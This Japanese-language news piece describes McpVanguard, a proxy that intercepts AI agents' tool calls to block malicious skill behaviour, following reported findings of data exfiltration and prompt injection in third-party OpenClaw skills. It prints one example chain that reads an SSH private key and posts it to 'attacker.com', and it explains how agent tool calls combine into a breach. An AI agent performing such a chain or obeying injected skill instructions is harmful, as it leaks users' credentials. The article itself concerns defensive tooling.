McpVanguardプロキシがOpenClawスキルデータの外部流出をブロック

CiscoのAIセキュリティチームがサードパーティ製OpenClawスキルによるサイレントデータ流出とプロンプトインジェクションを発見したことを受け、開発者がMcpVanguardをリリースしました。これはAIエージェントとそのツールの間に配置され、悪意のある呼び出しが実行される前にブロックするプロキシです。

問題点：連鎖的な悪意のある呼び出し

セキュリティ上の問題はOpenClaw自体のバグではなく、エージェントがファイルシステムアクセス、シェル実行、ネットワーク呼び出しを境界制限なく行えることに起因します。Ciscoのテストでは、一見無害な個々の呼び出しが組み合わさって侵害を引き起こすパターンが明らかになりました。例えば：

read_file("~/.ssh/id_rsa") → http_post("attacker.com", contents)

個別には悪意があるようには見えませんが、組み合わさると機密データが流出します。ソースによると、ClawHubにはピーク時に820以上の悪意のあるスキルがあり、CVE-2026-25253により攻撃者は単一の悪意のあるリンクを通じてリモートコード実行を達成できました。現在のスキルレベルの検証では、これらの連鎖的な呼び出しシーケンスを検出できません。

解決策：McpVanguardプロキシ

McpVanguardは、エージェントとそのツール間の呼び出しをインターセプトすることでこの問題に対処します。3つの検出方法を使用します：

• パターンマッチング
• 意味的意図スコアリング
• セッション全体にわたる行動連鎖検出

インストールはpip経由で行います：pip install mcp-vanguard。

深層レイヤー：VEXプロトコル

このプロジェクトには、VEXプロトコルと呼ばれるより深いセキュリティレイヤーが含まれており、「フライトレコーダー」システムと説明されています。以下を提供します：

• 改ざん検知可能なログのためのマークル監査証跡
• TPMベースのエージェントID検証
• システムコールレベルの強制実行

VEXプロトコルはRustで構築されており、開発は2023年12月に開始されました。これはOpenClawが広く普及する前のことです。ソースによると、NVIDIAは最近、同様のセキュリティ目的でNemoClawを出荷しており、この種の脅威がなくなることはないことを示しています。

両プロジェクトはGitHubで利用可能です：

• McpVanguard repository
• VEX Protocol repository